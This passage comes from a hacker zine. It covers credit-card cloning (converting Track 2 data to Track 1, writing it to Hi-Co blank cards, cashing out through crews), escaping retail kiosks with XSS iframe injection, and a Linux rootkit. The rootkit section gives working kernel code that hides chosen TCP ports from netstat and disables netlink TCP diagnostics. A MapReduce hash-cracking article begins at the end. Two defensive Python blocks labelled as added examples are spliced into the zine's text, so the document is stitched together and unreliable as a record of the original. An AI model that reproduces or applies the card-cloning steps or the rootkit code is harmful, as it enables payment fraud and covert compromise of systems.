Although rare, ATM malware is a rising issue among those in the carding community. After the success of the Diebold Ghost trojan, there have been countless requests and confirmations of development of malware designed for specific platforms, namely the Windows CE environment, a favourite among ATM systems. This malware effectively logs all read card data and PINs, printing them to a file encrypted by the malware for later collection. Alternatively, some variants have even offered to print off all stolen credentials in a 'bank statement' format using the ATM's printer. Needless to say, the deployment of this malware originates from an insider, usually employed or hired by the criminals to infect the ATM system from an ATM technician role.

[[ Converting Track Data ]]
-----------------------

Track 2 data will often appear in the following format:

    5281169568596016=14101010000045100001
    |               ||   |       |
    |               ||   |       +-- CVV (451)
    |               ||   +-- service code (101)
    |               |+-- expiration date (1410)
    |               +-- field separator
    +-- card number

Where:

    5281169568596016 = credit card number
    14               = expiry year
    10               = expiry month
    101              = service code
    451              = CVV

To generate Track 1 information from a Track 2 field, one must follow these simple steps:

1. Add a 'B' before the credit card number.
2. Replace the '=' with '^LASTNAME/FIRSTNAME^'.
3. Add six '0's after the T2 data.
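The Track 2 layout broken down above is also exactly what a defender looks for when checking logs, database exports and memory dumps for card data that should never have been retained (PCI DSS forbids storing full track data after authorization). The following is an added example, not part of the zine: a scanner that recognises the PAN=YYMM+service-code+discretionary layout, applies the Luhn check to weed out random digit runs, and redacts whatever it finds. The sample log lines are constructed.

```python
import re

# Track 2 layout as broken down above: PAN '=' YY MM service-code discretionary
# (the CVV sits inside the discretionary data).  Lookarounds keep the match from
# starting or ending inside a longer run of digits.
TRACK2_RE = re.compile(r"(?<!\d)(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)(?!\d)")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check digit test carried by real card numbers; filters random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def parse_track2(field: str):
    """Split one Track 2 field into its parts, or return None if it is not one."""
    m = TRACK2_RE.fullmatch(field)
    if not m:
        return None
    pan, yy, mm, svc, disc = m.groups()
    return {
        "pan": pan,
        "expiry_year": yy,
        "expiry_month": mm,
        "expiry_plausible": 1 <= int(mm) <= 12,
        "service_code": svc,
        "discretionary": disc,
        "luhn_ok": luhn_ok(pan),
    }


def mask_pan(pan: str) -> str:
    """PCI-style truncation: keep the first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_for_track2(text: str):
    """Find Track 2 fields anywhere in text (logs, DB exports, memory dumps).

    Returns (findings, redacted_text): findings carry the masked PAN plus the
    parsed fields; redacted_text has every field replaced by a placeholder so
    the scanner's own output never re-stores the data it was looking for.
    """
    findings = []

    def _redact(m):
        info = parse_track2(m.group(0))
        info["pan"] = mask_pan(info["pan"])
        findings.append(info)
        return f"[TRACK2 REDACTED pan={info['pan']}]"

    return findings, TRACK2_RE.sub(_redact, text)


# Constructed sample log (not real data): line 2 reuses the zine's sample field
# (its PAN does not pass Luhn, as is typical of made-up numbers), line 3 uses the
# well-known Luhn-valid test PAN 4111111111111111 with a constructed suffix, and
# line 4 is a decoy with '=' between digits but no expiry/service code.
SAMPLE_LOG = (
    "2011-04-01 12:00:01 pos01 auth ok txn=8821 amount=19.99\n"
    "2011-04-01 12:00:02 pos01 DEBUG raw=5281169568596016=14101010000045100001 pin=****\n"
    "2011-04-01 12:00:03 pos01 DEBUG raw=4111111111111111=1312101123456789 pin=****\n"
    "2011-04-01 12:00:04 pos01 auth ok txn=8822 ref=1234567890123=9912\n"
)

if __name__ == "__main__":
    found, clean = scan_for_track2(SAMPLE_LOG)
    for f in found:
        print(f)
    print(clean)
```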
Applying these steps to the sample above, the outputted Track 1 data should read as follows:

    B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000

[[ Writing Track Data ]]
--------------------

Once both the Track 1 and Track 2 fields are complete, the data is ready for writing to the blank medium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of high-quality printing. Services offered typically cost around $15 per card. If the attacker is running a large operation, then he/she may even purchase the printing equipment themself. This is comprised of:

- Hi-Co Magnetic Stripe PVC Cards
- PVC Printer (Zebra printers are well known for this purpose)
- PVC card embosser (to emboss credentials on the card)
- PVC card tipper (to tip the embossing with silver/gold)
- Signature Panels (on the reverse of the card, often left out by inexperienced carders)
- Holograms (typically stickers or hot-roll stamps)

The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity, the magnetic field strength required to write data to such cards. All credit/bank cards are Hi-Co and thus need the appropriate device to be written to. Any device capable of writing at a coercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable. Note that most standard magstripe readers can read Hi-Co cards; coercivity only comes into question in the writing process. The most common Hi-Co magnetic stripe writers are the MSR-206 and MSR-606. The software packages supplied with these writers are extremely easy to operate: it is only a matter of copying and pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', and swiping the blank card through the writer.

[[ Cashing Track Data ]]
--------------------

After this initial attack is complete, the attacker has two options to produce profit:

1. Form a crew to work with, willing to cash out this data.
   Higher risk of law enforcement, lower risk of being scammed by those you work with.
2. Work with existing crews, often overseas.
   Lower risk of law enforcement, higher risk of being scammed by those you work with.

Existing crews work on a percentage basis, normally offering a high percentage to the card supplier, and if the cash-out is successful, will either return that percentage through Western Union or run with the money. Typically, 'test cards' will be exchanged in order for these crews to prove their authenticity. Forming a crew usually means a localized operation, susceptible to investigation by local authorities before any foreign law enforcement bodies are involved. I believe most crews operate in this manner: a localised crew, often employed by a gang or mafia, supplying card data to their superiors for resale (such as those sold online) or for cash-out by a second team.

[[ Conclusion ]]
------------

Through my experiences investigating the darker parts of the Internet, specifically carding and fraud, trends show that vendors of card data and/or information tend to be from a Russian source. It is my belief that the operations involved in obtaining and distributing this information are largely mafia-based. I hope the information contained within this paper is enough to deter people from the 'carding scene' rather than to spark an interest in it for personal gain. The people involved are generally small fish, but around every large forum I have visited there are people with connections I'd dare not cross.

[==================================================================================================]

-=[ 0x06 Brief Notes on Retail Kiosk Hacking
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

If you've ever left your basement and ventured outside to the real world, you've more than likely come into contact with a kiosk at some point in a store or hotel.
Most kiosks provide only a limited keyboard or run a very stripped-down version of Windows, rendering certain actions difficult or impossible to achieve directly, but that only makes it all the more fun. This is by no means an exhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I've compiled through my own personal experiences that may either help you or provide inspiration when approaching a new device.

In the MSP airport, there is a kiosk running software called SiteKiosk. The device provides Internet access at outrageous prices ($20/hour), although complimentary access to the airport's website and Weather.com is so thoughtfully offered. As I sit typing this, my plane has been delayed about 3.5 hours due to the torrents of snow outside, so I figured messing with the kiosk would give me something to do other than eating candy and futilely waiting for the Boingo hotspot page to load.

The keyboard is clunky and missing sensitive keys like Ctrl and Alt; the mouse is a trackball with two buttons, though the right-click button seems unresponsive. The web browser used by this kiosk looks very much like a version of Internet Explorer themed with cleaner icons, and the file bar and taskbar are hidden from view.

With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinations like Ctrl+Alt+Del, so the first step is to poke around at what we can do with the software. The fact that we can access the airport's website and Weather.com is very curious, especially since the advertisements (which are hosted on third-party servers) load fine, yet putting anything in the URL bar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in its quick lookup, so a simple zip code search injects an IFrame into the page, displaying our coveted search engine.
When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a single web site (think the online catalog at Staples stores) or to reduce functionality (until the user forks up their money), XSS is a good place to start. It is common enough that even if you don't come prepared with a known XSS in the target website, it's usually a trivial matter to find one on the spot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exercise other web browser functionality that may escalate our access, provide an opportunity to escalate our access, or provide further information about the box.

At this point, we have achieved free Internet access (within the IFrame), but there are more interesting things to do than reading Reddit. A simple search for ha.ckers.org's iKat suite leads us to a swiss army knife of tools to probe the system we're on. Through this, we learn that our user-agent is:

    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; SiteKiosk 6.6 Build 213)

We can browse the filesystem by invoking the "Browse" form field, but unfortunately the lack of right-click doesn't let us easily open files and execute programs. If right-click were enabled, we would be able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program, and select open to spawn a shell. Explorer.exe is another good place to start. Once cmd.exe is open, we would be able to manipulate the system, probe local files or scan the network, or kill the kiosk software using `tasklist` and `taskkill`. Unfortunately, the ability to view My Computer also seemed to be disabled. I did not spend a large amount of time probing the system or enumerating all of the tools provided by iKat, but I did discover the existence of a file named trust-root.p7b on the Desktop which looked interesting, along with a shortcut to the SiteKiosk software.
In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby of a Marriott hotel, provided by a company called iBAHN. If I recall correctly, this too was running SiteKiosk, but the interface looked very different from the kiosk I encountered in MSP, and it provided a range of additional functions such as printing and access to Microsoft Office. The device seemed to take great care not to give too much access to the user (the software provided its own, more limited filesystem browser that was meant to open documents from flash drives), but it wasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menu, or by navigating the help bar in online mode, right-clicking and selecting "View Source". This would invoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and the USB stick that was currently plugged in, but it was possible to access C:\ simply by typing it in the navigation bar.

There are plenty of kiosks around to play with, and many of them possess blatant holes in their access restriction software. Even if there is nothing inherently interesting on the device, it might be a good idea to check if it's connected to the network or if it dials home anywhere. Just in general, it's fun to circumvent the software and snoop about the device, and of course things like free Internet are always cool too. Some devices I've seen think they are clever, or are just unstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes & Noble, are still to be determined. For instance, attempting to XSS the B&N website from their in-store kiosk results in the device locking up and calling for employee assistance. Other devices disable right-click, removing certain escalation opportunities and the ability to access critical functionality necessary for an attack.
There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hacking stories, drop us a message and your submission might just be in the next zine.

[==================================================================================================]

-=[ 0x07 Linux Rootkit Development Update
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

In Linux kernel version 2.6.36, some changes to the procfs API broke the interface that previously existing rootkits had with /proc/net/tcp. This is a critical change as far as rootkit functionality goes, since a new technique is required to hide TCP ports from userland administration programs such as netstat(8) and other network statistics gathering tools. Thanks to fawx for initially bringing this issue to my attention.

As a side note: if you have any questions about the intricacies of the Linux kernel, as we will be working closely with it throughout the course of this paper, consult /usr/src/linux/Documentation or any of the links provided as references at the bottom.

Prior to the release of 2.6.36, most Linux rootkits utilized a sequential search of the proc_net->subdir linked list to locate the procfs data structure corresponding to the filesystem pathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in 2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connection hiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn't changed in order to safeguard against rootkits -- that was only an unintended side effect. In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the new interface. A new kernel function is dedicated specifically to the purpose of initializing the /proc/net/tcp file.
Note that I'm using the term "file" loosely in this context, as procfs doesn't behave like a typical filesystem that utilizes disk-based storage. In userland, when a file descriptor corresponding to a procfs pathname is read(), the results are actually custom-formatted kernel data objects. That's why /proc/net/tcp and, in fact, the majority of procfs pathnames, appear as empty files when the stat() system call is executed on them. Although procfs files do have inodes, their values approach 2**32 (the upper limit for ino_t), and thus they are outside the range used by partitioned disk filesystems. Observe the differences in output between the following two commands:

$ stat /proc/net/tcp
  File: `/proc/net/tcp'
  Size: 0               Blocks: 0          IO Block: 1024   regular empty file
Device: 3h/3d   Inode: 4026531957  Links: 1
Access: (0444/-r--r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2011-02-19 12:16:32.853287891 -0500
Modify: 2011-02-19 12:16:32.853287891 -0500
Change: 2011-02-19 12:16:32.853287891 -0500
 Birth: -

$ stat /bin/ls
  File: `/bin/ls'
  Size: 109736          Blocks: 224        IO Block: 4096   regular file
Device: 303h/771d       Inode: 7660308     Links: 1
Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2010-12-25 23:33:12.000000000 -0500
Modify: 2010-12-24 12:18:47.000000000 -0500
Change: 2010-12-24 12:19:01.000000000 -0500
 Birth: -

As you can see, the procfs pathname has a rather large inode number and a file size of 0, despite the fact that we would receive data back if we ran `cat` against it. In the preceding examples, the /usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system call against the absolute pathnames given as arguments. In this next typescript, statfs() will be run due to the "-f" command line option, which is the abbreviated form of the getopt_long() option "--file-system", as documented in the stat(1) man page and GNU info pages.
$ stat -f /boot
  File: "/boot"
    ID: f6c5e14bf02df87f Namelen: 255     Type: ext2/ext3
Block size: 1024       Fundamental block size: 1024
Blocks: Total: 32175      Free: 11084      Available: 9423
Inodes: Total: 8320       Free: 8266

$ stat -f /proc
  File: "/proc"
    ID: 0        Namelen: 255     Type: proc
Block size: 4096       Fundamental block size: 4096
Blocks: Total: 0          Free: 0          Available: 0
Inodes: Total: 0          Free: 0

Clearly, procfs is special, since the majority of its statistical information is zeroed out. The glaring contrast in block size results from extfs handling disk blocks, whereas procfs handles memory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096. However, page size is platform dependent, so your mileage may vary. Note that sysfs behaves in a manner identical to procfs according to statfs(). If your kernel is configured to support sysfs, you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers would probably want to concern themselves with the most is /sys/kernel. Again, depending on your /usr/src/linux/.config or /proc/config.gz settings at the kernel's compile time, various subdirectories could be available under /sys/kernel. My machine currently has the debug, security, and mm (memory manager) directories enabled.

Now that we've gotten the basics squared away, let's take a look at a rootkit...

struct proc_dir_entry *proc_find_tcp()
{
        struct proc_dir_entry *p = proc_net->subdir;

        while (strcmp(p->name, "tcp"))
                p = p->next;

        return p;
}

This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code above shows the tediousness involved in accessing pathnames under the /proc/net directory. Since the kernel didn't have any direct access functions defined, it became necessary to loop over the directory entries manually.
The last kernel version supported by this particular adore-ng release appears to be 2.6.16, judging by some conditional preprocessor directives within the source:

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16)
MODULE_PARM(root_fs, "s");
MODULE_PARM(proc_fs, "s");
MODULE_PARM(opt_fs, "s");
#else
module_param(root_fs, charp, 0644);
module_param(proc_fs, charp, 0644);
module_param(opt_fs, charp, 0644);
#endif

It looks as if prior to 2.6.16 there was less convenient syntax available for those developing Loadable Kernel Modules (LKMs). At the time of writing this article, the latest stable Linux kernel is 2.6.37.1. However, I'll be using gentoo-sources-2.6.37 from the Gentoo portage tree. For the sake of consistency, let's double check the current kernel versions:

$ finger @kernel.org
[kernel.org]
The latest linux-next version of the Linux kernel is:    next-20110218
The latest snapshot 2.6 version of the Linux kernel is:  2.6.38-rc5-git5
The latest mainline 2.6 version of the Linux kernel is:  2.6.38-rc5
The latest stable 2.6.37 version of the Linux kernel is: 2.6.37.1
The latest stable 2.6.36 version of the Linux kernel is: 2.6.36.4
The latest longterm 2.6.35 version of the Linux kernel is: 2.6.35.11
The latest stable 2.6.35 version of the Linux kernel is: 2.6.35.9
The latest longterm 2.6.34 version of the Linux kernel is: 2.6.34.8
The latest stable 2.6.34 version of the Linux kernel is: 2.6.34.7
The latest longterm 2.6.32 version of the Linux kernel is: 2.6.32.29
The latest stable 2.6.32 version of the Linux kernel is: 2.6.32.28
The latest longterm 2.6.27 version of the Linux kernel is: 2.6.27.58
The latest stable 2.6.27 version of the Linux kernel is: 2.6.27.57
The latest stable 2.4.37 version of the Linux kernel is: 2.4.37.11

In 2.6.36, the pointer to the global proc_net structure variable (seen in the adore-ng-0.56 code above) disappeared.
After grepping around through the kernel source code a bit, I realized that the functionality had been so heavily modified that I wasn't sure where to hook into /proc/net/tcp from. I was able to grep /boot/System.map for procfs-related symbols and realized it was going to be a lot easier than I thought. I found a tcp_proc_register function that allowed me to re-create /proc/net/tcp. Also, the proc_net structure that was being referenced by adore-ng had now become init_net. So, I simply deleted the existing /proc/net/tcp with proc_net_remove and re-initialized it with the address of a custom struct (just to clarify, we are right now working inside the kernel):

static struct tcp_seq_afinfo tcp4_seq_afinfo = {
        .name     = "tcp",
        .family   = AF_INET,
        .seq_fops = { .owner = THIS_MODULE },
        .seq_ops  = { .show  = new_tcp4_seq_show }
};

To understand what's going on here, one needs to realize that procfs makes itself appear to userland as any other filesystem would. It exposes various functions for operating on the files and directories themselves, e.g., open, read, readdir, seek, etc. That's where the new_tcp4_seq_show function comes in. The relative pathname to the file where the real tcp4_seq_show is defined is net/ipv4/tcp_ipv4.c (as documented by Documentation/networking/proc_net_tcp.txt). The new_tcp4_seq_show function is a malicious wrapper which invokes the legitimate tcp4_seq_show function, unless it's determined that the TCP connection currently being processed by a read operation on /proc/net/tcp corresponds to a port number that is intended to be hidden by the rootkit. In that case, new_tcp4_seq_show will not construct the usual hexadecimal-encoded string that describes the connection.
static int (*old_tcp4_seq_show)(struct seq_file *seq, void *v) = 0;

/* Array initialization syntax must be zero-terminated */
static const unsigned short hidden_ports[] = { 6666, 7777, 888, 999, 0 };

static int new_tcp4_seq_show(struct seq_file *seq, void *v)
{
        const signed int retval = old_tcp4_seq_show(seq, v);
        register unsigned short i = 0;
        static unsigned int line = 0;
        auto char hex_port[8] = { 0 }, *offset = seq->buf + seq->count - NET_LINE;

        if (v == SEQ_START_TOKEN)
                return line = 0, retval;

        for (i = 0; hidden_ports[i]; i++) {
                sprintf(hex_port, ":%04X", hidden_ports[i]);

                if (strstr(offset, hex_port))
                        return seq->count -= NET_LINE, retval;
        }

        sprintf(offset, "% 4i", line++);

        return offset[4] = ':', retval;
}

The old_tcp4_seq_show identifier is simply a function pointer to the original tcp4_seq_show function, which was assigned to the .seq_ops member of the tcp_seq_afinfo structure whose definition was shown above. To reiterate, our new_tcp4_seq_show function is wrapping the real tcp4_seq_show function. The introduction of our wrapper function into the traditional kernel control flow effectively hides certain ports from userland by looping over an array that contains the rogue port numbers. In this way, running a command such as netstat will not display the TCP connections that have been hidden from /proc/net/tcp.

The hidden_ports array is specified with the C language keywords "static" and "const". These prevent the initialized port numbers from being accessed from outside of the current source file and from having their values modified after compilation. Also, the hidden_ports array is defined to be of type "unsigned short" because the source and destination port fields in TCP packet headers are non-negative and 16 bits wide. Section 3.1 of RFC793 demonstrates this with an ASCII art representation.
    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Now, to formally register our new /proc/net/tcp mechanism, we first remove the original, then pass pointers to the data structures representing the /proc/net directory and our new tcp entry within it. Simply invoke the appropriate functions when initializing the Loadable Kernel Module. The module_init macro tells the compiler which function to execute when using insmod on the compiled .ko (kernel object) file.

static int __init init_hidetcp(void)
{
        proc_net_remove(&init_net, "tcp");
        tcp_proc_register(&init_net, &tcp4_seq_afinfo);

        return 0;
}

module_init(init_hidetcp);

Let's go ahead and test it out to make sure everything works. After compiling the rootkit itself with GNU make and inserting the module into the kernel, we'll use netstat with the "-tW" command line flags so that only TCP connections are displayed and the wide display format allows us to view DNS hostnames in their entirety. One of the hidden port numbers we defined in the hidden_ports array was 7777, so let's see if netstat detects a connection on that port.

$ gmake
$ insmod hidetcp.ko
$ telnet us.undernet.org 7777
Trying 208.83.20.130...
Connected to us.undernet.org
Escape character is '^]'.
^]
telnet> z

[1]+  Stopped                 telnet us.undernet.org 7777
$ netstat -tW
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address            Foreign Address                     State
tcp        0      0 alien.localdomain:51889  please.dont.hacktheinter.net:6697   ESTABLISHED
$

So far, we've seen how to hide TCP connections to or from certain port numbers from userland programs that read from procfs. However, there's another way to access information about TCP connections: rtnetlink(3).
You can determine if a given program is using procfs or a netlink protocol by tracing for the respective function calls.

$ whatis netlink
netlink (3)          - Netlink macros
netlink (7)          - Communication between kernel and userspace (AF_NETLINK)
$ strace -fe trace=open,socket netstat -tW 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
open("/proc/net/tcp", O_RDONLY)         = 3
open("/proc/net/tcp6", O_RDONLY)        = -1 ENOENT (No such file or directory)
$ strace -fe trace=open,socket ./ss 2>&1 > /dev/null | egrep -i '(tcp|netlink)'
socket(PF_NETLINK, SOCK_RAW, 4)         = 3

The ss binary being traced above is a piece of code distributed with iproute2 that retrieves socket statistics. Iproute2 has a Wikipedia article at http://en.wikipedia.org/wiki/Iproute2 with some helpful links to get you up to speed. Some have probably noticed that the raw socket call succeeds despite the fact that my current prompt setting reflects that of a non-root user. Since the PF_NETLINK integer constant is the first argument instead of PF_INET, the kernel has no issue with providing a positive return value. Please note that rtnetlink isn't the only netlink protocol in existence -- there are many more; far too many to mention here.

There have been many academic research papers published on the subject of netlink over the past decade or so. One of the latest and most interesting is entitled "Communicating between the kernel and user-space in Linux using Netlink sockets" by Ayuso, Gasca and Lefevre. The types of security-related operations netlink alone is capable of performing are extremely comprehensive. For instance: detecting and mitigating DDoS attacks, subliminal channels between processes with disparate privileges, multicasting a single communications channel to multiple system users, implementing a dynamic routing protocol like Open Shortest Path First in userland, detecting network interfaces with promiscuous mode enabled, etc.
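The procfs and netlink views of the socket table come from independent kernel code paths, which is what makes the difference between them useful to a defender: a socket present in one view and absent from the other, or a netlink view that is suddenly empty while /proc/net/tcp still lists sockets, points at exactly the kind of tampering this article describes. The following cross-view checker is an added example, not code from the article or from iproute2; it parses the hex-encoded /proc/net/tcp format and the tabular output of `ss -4tan`, and its sample data is constructed to mirror the article's ss listing plus one connection on port 7777 that the procfs hook has filtered out.

```python
"""Cross-view check for hidden TCP sockets: diff what procfs reports against
what netlink (ss) reports for the same machine.  Added example, not from the
article.  All sample data below is constructed."""
import socket
import struct
import subprocess

# /proc/net/tcp layout: IPv4 address as little-endian hex, port as big-endian hex.
# Row 0 is a listener (state 0A), rows 1-2 are ESTABLISHED (state 01).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9876 1 0000000000000000 100 0 0 10 0
   1: 6401A8C0:DE59 93CC0E48:0050 01 00000000:00000000 00:00000000 00000000  1000        0 17741 1 0000000000000000 20 4 30 10 -1
   2: 6401A8C0:C825 6E241BB8:0016 01 00000000:00000000 00:00000000 00000000  1000        0 17902 1 0000000000000000 20 4 30 10 -1
"""

# The same machine as reported over netlink (`ss -4tan`).  The 7777 connection
# is absent from the procfs sample above because the hook dropped its line.
SAMPLE_SS = """\
State      Recv-Q Send-Q      Local Address:Port          Peer Address:Port
LISTEN     0      128               0.0.0.0:22                  0.0.0.0:*
ESTAB      0      0           192.168.1.100:56921        72.14.204.147:80
ESTAB      0      0           192.168.1.100:51237        184.27.36.110:22
ESTAB      0      0           192.168.1.100:41234        208.83.20.130:7777
"""


def _decode_hex_addr(hexaddr):
    """'6401A8C0:DE59' -> ('192.168.1.100', 56921)."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Set of (local_ip, local_port, peer_ip, peer_port) tuples seen via procfs."""
    conns = set()
    for line in text.splitlines()[1:]:          # skip the column header
        fields = line.split()
        if len(fields) < 4 or not fields[0].endswith(":"):
            continue
        conns.add(_decode_hex_addr(fields[1]) + _decode_hex_addr(fields[2]))
    return conns


def _split_host_port(col):
    host, port = col.rsplit(":", 1)
    return host, 0 if port == "*" else int(port)   # ss prints '*' for a wildcard peer port


def parse_ss(text):
    """The same tuple set from `ss -4tan` style output (netlink / inet_diag)."""
    conns = set()
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 5:
            continue
        conns.add(_split_host_port(fields[3]) + _split_host_port(fields[4]))
    return conns


def cross_view_diff(proc_text, ss_text):
    """(sockets netlink sees but procfs does not, sockets procfs sees but netlink does not)."""
    via_proc, via_netlink = parse_proc_net_tcp(proc_text), parse_ss(ss_text)
    return via_netlink - via_proc, via_proc - via_netlink


def describe(proc_text, ss_text):
    """Human-readable findings; an empty list means the two views agree."""
    missing_proc, missing_nl = cross_view_diff(proc_text, ss_text)
    out = [f"hidden from /proc/net/tcp: {l}:{lp} -> {r}:{rp}" for l, lp, r, rp in sorted(missing_proc)]
    out += [f"hidden from netlink (inet_diag): {l}:{lp} -> {r}:{rp}" for l, lp, r, rp in sorted(missing_nl)]
    if parse_proc_net_tcp(proc_text) and not parse_ss(ss_text):
        out.append("netlink returned no TCP sockets at all: inet_diag handler unregistered?")
    return out


if __name__ == "__main__":
    # Live run (Linux only): compare the real procfs and netlink views.
    with open("/proc/net/tcp") as f:
        proc_text = f.read()
    ss_text = subprocess.run(["ss", "-4tan"], capture_output=True, text=True, check=True).stdout
    for finding in describe(proc_text, ss_text) or ["views agree"]:
        print(finding)
```

Sockets in transient states can legitimately differ between two reads taken a few milliseconds apart, so on a live system repeat the comparison and alert only on differences that persist.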
In this particular scenario, only a specific aspect of netlink needs to be used to accomplish the final goal of TCP connectivity that's as low-key as possible. Since connections hidden from /proc/net/tcp can still be viewed via the netlink socket interface, another technique must be used to avoid such disclosure. Here's another example typescript (`man script`) of the ss program from the misc directory in iproute2's source tree as it executes on the standard output stream:

$ ./ss
State      Recv-Q Send-Q      Local Address:Port          Peer Address:Port
ESTAB      0      0           192.168.1.100:56921        72.14.204.147:80
ESTAB      0      0           192.168.1.100:51237        184.27.36.110:22

In this case, the two TCP sockets listed are both in the connection-established state. The four empty message queue values being shown mean that the kernel has delivered all pending data transmissions to and from the socket as of the current runtime. The code that handles Internet diagnostics monitoring for the Linux kernel's rtnetlink protocol is located in /usr/src/linux/net/ipv4/inet_diag.c, and /usr/src/linux/include/linux/inet_diag.h is of course the associated header file. TCP-specific code is located elsewhere. However, we can simply disable all TCP socket diagnostics without referencing any of the tcp_inet_diag oriented source files. The following short code snippet, inserted into the rootkit module's initialization function, is sufficient to prevent netlink from utilizing any TCP socket monitoring methods whatsoever:

static struct inet_diag_handler h;

h.idiag_type = TCPDIAG_GETSOCK;
inet_diag_unregister(&h);

Don't forget to include linux/inet_diag.h. Now iproute2's ss binary won't output any TCP connections at all, since the handler responsible for the message type it was processing has been removed. It works, but it would be even better to allow Internet socket diagnostics only for connections whose source and destination port numbers don't match our blacklist.
The full inet_diag_handler structure must be filled out, and inet_diag_register should be invoked as well. This is similar to passing the tcp_seq_afinfo structure to tcp_proc_register as outlined in the previous technique. A brief outline tracing nested structure members back to actual port values follows. However, putting that concept into compilable rootkit source code form will be left as an exercise for the reader.

include/net/inet_sock.h
112 struct inet_sock {
113         __be16 inet_dport;
114         __be16 inet_sport;
115 }

include/net/inet_connection_sock.h
 86 struct inet_connection_sock {
 87         /* inet_sock has to be the first member! */
 88         struct inet_sock icsk_inet;

include/linux/tcp.h
292 struct tcp_sock {
293         /* inet_connection_sock has to be the first member of tcp_sock */
294         struct inet_connection_sock inet_conn;

net/ipv4/tcp_diag.c
 20 static void tcp_diag_get_info(struct sock *sk, struct inet_diag_msg *r,
 21                               void *_info)
 22 {
 23         const struct tcp_sock *tp = tcp_sk(sk);

For more information on Linux kernel development, check out:

- The Linux Kernel Newbies site
  http://kernelnewbies.org/
- The linux-kernel mailing list FAQ
  http://www.tux.org/lkml/
- The Linux Kernel Hackers' Guide from the Linux Documentation Project
  http://tldp.org/LDP/khg/HyperNews/get/khg.html (highly recommended)
- And, of course, the main Linux Kernel Archives site
  http://kernel.org

[==================================================================================================]

-=[ 0x08 High Performance Hash Cracking with MapReduce, Part 2
-=[ Author: elchupathingy
-=[ IRC: irc.gonullyourself.org #gny

/----------------------------------------------------------------------------------------
|
| Introduction
|

The last article talked about the basic theory of MapReduce and a few examples of how it can be used.
The options for MapReduce are not limited to those mentioned, but they are the easiest ones for understanding the concept of breaking up larger tasks and passing this information on to other nodes. For this article, we will focus more on the code aspect of MapReduce instead of the higher-level concepts.

/----------------------------------------------------------------------------------------
|
| Background
|

The very basic implementation of MapReduce shown here is something that can be expanded upon easily. It provides the method of automatic data pre-processing and automatic post-processing. But, being a simple implementation, there are problems with some of the mechanics inside the code. That, though, is left to someone else to fix. By familiarizing yourself with the algorithm and stepping through the code, it should be a trivial matter to have yourself a fully functioning MapReduce implementation.

/----------------------------------------------------------------------------------------
|
| Theory
|

To recap: the idea behind MapReduce is quite simple to grasp, but its layout is detailed and may lead to confusion at times. Here is a look at a typical layout of a MapReduce network:

                /-------------------------------------------\
  /------\      |          |          |          |          |
  |Master|------/          |          |          |          |
  \------/   /------\   /------\   /------\   /------\   /------\
             |Mapper|   |Mapper|   |Mapper|   |Mapper|   |Mapper|
             \------/   \------/   \------/   \------/   \------/
                |          |          |          |          |
            /-------\  /-------\  /-------\  /-------\  /-------\
            |Reducer|  |Reducer|  |Reducer|  |Reducer|  |Reducer|
            \-------/  \-------/  \-------/  \-------/  \-------/
                |          |          |          |          |
                \----------+----------+----------+----------/
                                      |
                                 /---------\
                                 |Answer!!!|
                                 \---------/

Now that's a picture. This network layout has two key characteristics:

1) Series of Mappers
2) Series of Reducers

These two things are the meat of the MapReduce concept. Now, what exactly is MapReduce?
It's formally defined as the following:

/------------------------------------------------------------------------------------
|MapReduce is a framework for processing huge datasets on certain kinds of
|distributable problems using a large number of computers (nodes), collectively
|referred to as a cluster. Computational processing can occur on data stored either
